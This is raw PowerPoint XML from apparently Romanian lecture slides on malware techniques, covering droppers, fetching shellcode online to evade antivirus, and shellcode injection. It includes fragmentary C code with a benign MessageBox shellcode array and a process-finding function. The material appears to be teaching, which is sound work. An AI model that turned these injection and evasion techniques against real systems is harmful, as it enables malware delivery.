                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Echipa de securitate GitHub</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
            </a:pPr>
            <a:br>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://github.com</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>support@github.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2075883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Mascarea email-ului sursă</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664" y="2372301"/>
            <a:ext cx="5076328" cy="3678238"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="190500" algn="tl" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="70000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="6" name="Straight Arrow Connector 5"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="1667078" y="6114039"/>
            <a:ext cx="120650" cy="4587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657678" y="2719963"/>
            <a:ext cx="377825" cy="29686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649" y="2494079"/>
            <a:ext cx="3268429" cy="3268429"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="349588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a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" u="sng"/>
              <a:t>C.12.2</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Droppers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06204" y="685814"/>
            <a:ext cx="2194634" cy="21946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15263">
            <a:off x="595336" y="741733"/>
            <a:ext cx="5297960" cy="3533739"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="3810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7991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normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Constructori</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Cum arata un droper?</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>Scriere pe disc vs scriere in memoria RAM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387" y="663273"/>
            <a:ext cx="2674587" cy="109156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84" y="2326189"/>
            <a:ext cx="4432874" cy="3196785"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12"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1905" y="2326190"/>
            <a:ext cx="5959054" cy="319678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13" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="5750117"/>
            <a:ext cx="10515600" cy="673735"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>https://github.com/Gagniuc/Binary-files-inside-EXCEL-VBA</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94764932-7267-0D0B-0AD8-7DB83B7DA3C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7778" b="97870" l="10000" r="90000">
                        <a14:foregroundMark x1="38750" y1="20648" x2="45833" y2="8333"/>
                        <a14:foregroundMark x1="45833" y1="8333" x2="50573" y2="7870"/>
                        <a14:foregroundMark x1="50573" y1="7870" x2="53333" y2="13333"/>
                        <a14:foregroundMark x1="53333" y1="13333" x2="54375" y2="22222"/>
                        <a14:foregroundMark x1="54375" y1="22222" x2="49375" y2="21481"/>
                        <a14:foregroundMark x1="49375" y1="21481" x2="44688" y2="17685"/>
                        <a14:foregroundMark x1="44688" y1="17685" x2="49531" y2="14630"/>
                        <a14:foregroundMark x1="49531" y1="14630" x2="51615" y2="17407"/>
                        <a14:foregroundMark x1="37240" y1="16574" x2="39271" y2="11481"/>
                        <a14:foregroundMark x1="40521" y1="8333" x2="36927" y2="17685"/>
                        <a14:foregroundMark x1="36615" y1="17500" x2="38750" y2="11019"/>
                        <a14:foregroundMark x1="38750" y1="11019" x2="40833" y2="7963"/>
                        <a14:foregroundMark x1="36094" y1="45370" x2="33958" y2="51389"/>
                        <a14:foregroundMark x1="33958" y1="51389" x2="16354" y2="70185"/>
                        <a14:foregroundMark x1="16354" y1="70185" x2="20469" y2="70093"/>
                        <a14:foregroundMark x1="20469" y1="70093" x2="31458" y2="62870"/>
                        <a14:foregroundMark x1="31458" y1="62870" x2="36458" y2="65278"/>
                        <a14:foregroundMark x1="36458" y1="65278" x2="41667" y2="64074"/>
                        <a14:foregroundMark x1="41667" y1="64074" x2="39531" y2="57130"/>
                        <a14:foregroundMark x1="39531" y1="57130" x2="35156" y2="52407"/>
                        <a14:foregroundMark x1="35156" y1="52407" x2="37708" y2="62222"/>
                        <a14:foregroundMark x1="15625" y1="88148" x2="19948" y2="95741"/>
                        <a14:foregroundMark x1="19948" y1="95741" x2="24896" y2="96389"/>
                        <a14:foregroundMark x1="24896" y1="96389" x2="38698" y2="95556"/>
                        <a14:foregroundMark x1="38698" y1="95556" x2="63125" y2="98056"/>
                        <a14:foregroundMark x1="63125" y1="98056" x2="64792" y2="90185"/>
                        <a14:foregroundMark x1="64792" y1="90185" x2="64479" y2="89630"/>
                        <a14:foregroundMark x1="18021" y1="94815" x2="23385" y2="97685"/>
                        <a14:foregroundMark x1="23385" y1="97685" x2="44010" y2="96852"/>
                        <a14:foregroundMark x1="44010" y1="96852" x2="60260" y2="98611"/>
                        <a14:foregroundMark x1="60260" y1="98611" x2="64583" y2="97870"/>
                        <a14:foregroundMark x1="64583" y1="97870" x2="60677" y2="88333"/>
                        <a14:foregroundMark x1="60677" y1="88333" x2="59115" y2="80556"/>
                        <a14:foregroundMark x1="59115" y1="80556" x2="59219" y2="80000"/>
                        <a14:foregroundMark x1="64074" y1="79096" x2="64792" y2="83796"/>
                        <a14:foregroundMark x1="63984" y1="77135" x2="63906" y2="76574"/>
                        <a14:foregroundMark x1="65104" y1="85185" x2="64251" y2="79052"/>
                        <a14:foregroundMark x1="63906" y1="76019" x2="63906" y2="75463"/>
                        <a14:foregroundMark x1="64381" y1="79019" x2="64688" y2="82222"/>
                        <a14:foregroundMark x1="63906" y1="74074" x2="64195" y2="77082"/>
                        <a14:backgroundMark x1="35313" y1="14074" x2="32292" y2="30370"/>
                        <a14:backgroundMark x1="32292" y1="30370" x2="33750" y2="38519"/>
                        <a14:backgroundMark x1="33750" y1="38519" x2="32813" y2="47685"/>
                        <a14:backgroundMark x1="32813" y1="47685" x2="29115" y2="52685"/>
                        <a14:backgroundMark x1="29115" y1="52685" x2="19010" y2="58981"/>
                        <a14:backgroundMark x1="19010" y1="58981" x2="15469" y2="63426"/>
                        <a14:backgroundMark x1="15469" y1="63426" x2="12552" y2="70556"/>
                        <a14:backgroundMark x1="12552" y1="70556" x2="12240" y2="49537"/>
                        <a14:backgroundMark x1="12240" y1="49537" x2="18385" y2="39167"/>
                        <a14:backgroundMark x1="18385" y1="39167" x2="17552" y2="25833"/>
                        <a14:backgroundMark x1="17552" y1="25833" x2="19635" y2="18333"/>
                        <a14:backgroundMark x1="19635" y1="18333" x2="29688" y2="17963"/>
                        <a14:backgroundMark x1="29688" y1="17963" x2="28802" y2="43889"/>
                        <a14:backgroundMark x1="28802" y1="43889" x2="23542" y2="51759"/>
                        <a14:backgroundMark x1="23542" y1="51759" x2="13021" y2="55000"/>
                        <a14:backgroundMark x1="13021" y1="55000" x2="18125" y2="46759"/>
                        <a14:backgroundMark x1="18125" y1="46759" x2="20990" y2="32222"/>
                        <a14:backgroundMark x1="20990" y1="32222" x2="21198" y2="22593"/>
                        <a14:backgroundMark x1="21198" y1="22593" x2="26979" y2="22685"/>
                        <a14:backgroundMark x1="26979" y1="22685" x2="26302" y2="33611"/>
                        <a14:backgroundMark x1="26302" y1="33611" x2="23750" y2="44259"/>
                        <a14:backgroundMark x1="23750" y1="44259" x2="22865" y2="35278"/>
                        <a14:backgroundMark x1="22865" y1="35278" x2="24010" y2="27222"/>
                        <a14:backgroundMark x1="56927" y1="16759" x2="58073" y2="24537"/>
                        <a14:backgroundMark x1="58073" y1="24537" x2="55677" y2="43519"/>
                        <a14:backgroundMark x1="55677" y1="43519" x2="53438" y2="51019"/>
                        <a14:backgroundMark x1="53438" y1="51019" x2="57708" y2="55926"/>
                        <a14:backgroundMark x1="57708" y1="55926" x2="60052" y2="27407"/>
                        <a14:backgroundMark x1="60052" y1="27407" x2="63646" y2="18796"/>
                        <a14:backgroundMark x1="63646" y1="18796" x2="67604" y2="16389"/>
                        <a14:backgroundMark x1="67604" y1="16389" x2="68281" y2="16296"/>
                        <a14:backgroundMark x1="14688" y1="98889" x2="10469" y2="95000"/>
                        <a14:backgroundMark x1="65239" y1="82056" x2="65729" y2="86574"/>
                        <a14:backgroundMark x1="64740" y1="76944" x2="64896" y2="78889"/>
                        <a14:backgroundMark x1="14688" y1="92685" x2="16563" y2="98704"/>
                        <a14:backgroundMark x1="17135" y1="98519" x2="15521" y2="94259"/>
                        <a14:backgroundMark x1="16406" y1="96204" x2="16406" y2="96204"/>
                        <a14:backgroundMark x1="16354" y1="96111" x2="16354" y2="96111"/>
                        <a14:backgroundMark x1="17344" y1="99167" x2="17344" y2="99167"/>
                        <a14:backgroundMark x1="35521" y1="39722" x2="35469" y2="42407"/>
                        <a14:backgroundMark x1="35677" y1="41481" x2="35677" y2="41481"/>
                      </a14:backgroundRemoval>
                    </a14:imgEffect>
                  </a14:imgLayer>
                </a14:imgProps>
              </a:ext>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5330757" y="192664"/>
            <a:ext cx="2848530" cy="1602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406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186"/>
            <a:ext cx="12192000" cy="5103628"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Flowchart: Process 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="195943" y="2885439"/>
            <a:ext cx="5487271" cy="106970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13289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14261" y="2539419"/>
            <a:ext cx="7443273" cy="3433210"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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Dropere - Shell code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581192" y="2294326"/>
            <a:ext cx="3156237" cy="3678303"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Incorporare shelcode in dropper (antivirusul poate lua semnaturi din shellcode; chiar si daca se foloseste criptarea)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Descarcare shell code de pe online (ofruscare pentru antivirus)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5364388" y="870374"/>
            <a:ext cx="6096000" cy="861774"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Shellcode-ul este un set de instrucțiuni în limbaj de mașină utilizat adesea în exploit-uri pentru a controla comportamentul unui program afectat de o vulnerabilitate; pentru a crea un shellcode eficient, este esențial să fie compact, să evite caracterele nule și alte secvențe care ar putea termina prematur execuția și să fie adaptat la specificațiile mediului țintă, cum ar fi arhitectura sistemului și offset-urile de memorie.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1312223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a:t>C.12.3</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Injectia de cod masina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43245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Shellcode </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT"/>
            </a:br>
            <a:r>
              <a:rPr lang="it-IT" sz="1600"/>
              <a:t>in diferite tipuri de surse</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="16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5120" y="2061018"/>
            <a:ext cx="2718333" cy="219830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192" y="4470273"/>
            <a:ext cx="5837449" cy="199567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92" y="2061018"/>
            <a:ext cx="2905749" cy="219830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820" y="2872928"/>
            <a:ext cx="5098732" cy="359302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11" name="Rounded Rectangular Callout 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1816608" y="2872928"/>
            <a:ext cx="1402080" cy="854342"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -101241"/>
              <a:gd name="adj2" fmla="val -97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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Rounded Rectangular Callout 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4771390" y="3160170"/>
            <a:ext cx="1402080" cy="854342"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -101241"/>
              <a:gd name="adj2" fmla="val -97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sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Rounded Rectangular Callout 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4614672" y="5244272"/>
            <a:ext cx="1402080" cy="854342"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -101241"/>
              <a:gd name="adj2" fmla="val -97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Power Shell</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Rounded Rectangular Callout 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8900160" y="4890704"/>
            <a:ext cx="1402080" cy="854342"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -101241"/>
              <a:gd name="adj2" fmla="val -97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Parametru exectutie</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Rectangle 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6751983" y="2061018"/>
            <a:ext cx="4516814" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Toate limbajele de programare cu acces la API </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>permit encodare si injectie de shellcode</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5364388" y="870374"/>
            <a:ext cx="6096000" cy="861774"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Shellcode-ul este un set de instrucțiuni în limbaj de mașină utilizat adesea în exploit-uri pentru a controla comportamentul unui program afectat de o vulnerabilitate; pentru a crea un shellcode eficient, este esențial să fie compact, să evite caracterele nule și alte secvențe care ar putea termina prematur execuția și să fie adaptat la specificațiile mediului țintă, cum ar fi arhitectura sistemului și offset-urile de memorie.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="396672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Dropper update</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200"/>
              <a:t>descărcare și execuție shellcode</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="Group 2"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4700016" y="866170"/>
            <a:ext cx="3962400" cy="2626838"/>
            <a:chOff x="4700016" y="866170"/>
            <a:chExt cx="3962400" cy="2626838"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="Rounded Rectangular Callout 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4700016" y="866170"/>
              <a:ext cx="3962400" cy="2626838"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeRoundRectCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val -31886"/>
                <a:gd name="adj2" fmla="val 763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341" y="1080437"/>
              <a:ext cx="2905749" cy="2198304"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>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786" y="2351709"/>
            <a:ext cx="3892364" cy="389236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8171" y="3314911"/>
            <a:ext cx="1965960" cy="196596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871" y="4432003"/>
            <a:ext cx="1853105" cy="1853105"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="9" name="Straight Arrow Connector 8"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="13" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="2894131" y="4297891"/>
            <a:ext cx="1537740" cy="10606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3" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6284976" y="4593686"/>
            <a:ext cx="2142769" cy="7648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58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168" y="0"/>
            <a:ext cx="6096000" cy="6906314"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="9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&lt;windows.h&gt;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&lt;stdio.h&gt;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&lt;stdlib.h&gt;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&lt;string.h&gt;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&lt;tlhelp32.h&gt;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MessageBox shellcode - 64-bit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unsigned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0x81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0xe4</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0xe8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0xd0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0x56</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0x31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0xd2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0x65</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0x8b</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0x3e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0x8b</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0x18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0x3e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0x8b</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0x78</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0x65</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0x69</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0x65</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0x74</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0x65</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0x20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0x20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0x54</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0x20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0x3d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0x2d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0x74</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unsigned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payload_len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334</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FindTarget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procname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HANDLE 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PROCESSENTRY32 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hProcSnap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CreateToolhelp32Snapshot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TH32CS_SNAPPROCESS</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INVALID_HANDLE_VALUE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dwSize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PROCESSENTRY32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Process32First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while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Process32Next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lstrcmpiA</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procname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szExeFile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pe32</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th32ProcessID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break</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hProcSnap</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6519671" y="1322195"/>
            <a:ext cx="5077968" cy="4893647"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Include Directives - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200"/>
              <a:t>Aceste directive îi spun compilatorului să includă informații din bibliotecile externe specifice sistemului de operare Windows și standardul C++:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200"/>
              <a:t>#include &lt;windows.h&gt; // Pentru funcții specifice Windows.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200"/>
              <a:t>#include &lt;stdio.h&gt;        // Pentru input/output standard, de exemplu printf.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200"/>
              <a:t>#include &lt;stdlib.h&gt;       // Pentru funcții standard de alocare și conversie.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200"/>
              <a:t>#include &lt;string.h&gt;       // Pentru manipularea șirurilor de caractere.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200"/>
              <a:t>#include &lt;tlhelp32.h&gt;  // Pentru funcții de snapshot pentru procese.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Shellcode - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200"/>
              <a:t>Acest array payload este un bloc de cod în limbaj de asamblare convertit în format hexazecimal. Codul poate fi folosit pentru a efectua o acțiune specifică, în acest caz, afișarea unui messagebox:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200"/>
              <a:t>unsigned char payload[] = { ... };</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200"/>
              <a:t>unsigned int payload_len = 334; // Lungimea shellcode-ului în bytes.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Funcția FindTarget - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200"/>
              <a:t>Această funcție caută procesul cu numele specificat și returnează identificatorul de proces (PID):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200"/>
              <a:t>int FindTarget(const char *procname) { ... }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CreateToolhelp32Snapshot - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200"/>
              <a:t>Creează o listă instantanee a tuturor proceselor din sistem.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Process32First &amp; Process32Next - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200"/>
              <a:t>Iterează prin procesele listate în snapshot pentru a găsi procesul dorit.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5876544"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339840" y="102995"/>
            <a:ext cx="5056632" cy="1219200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Injectia de Shellcode (I)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
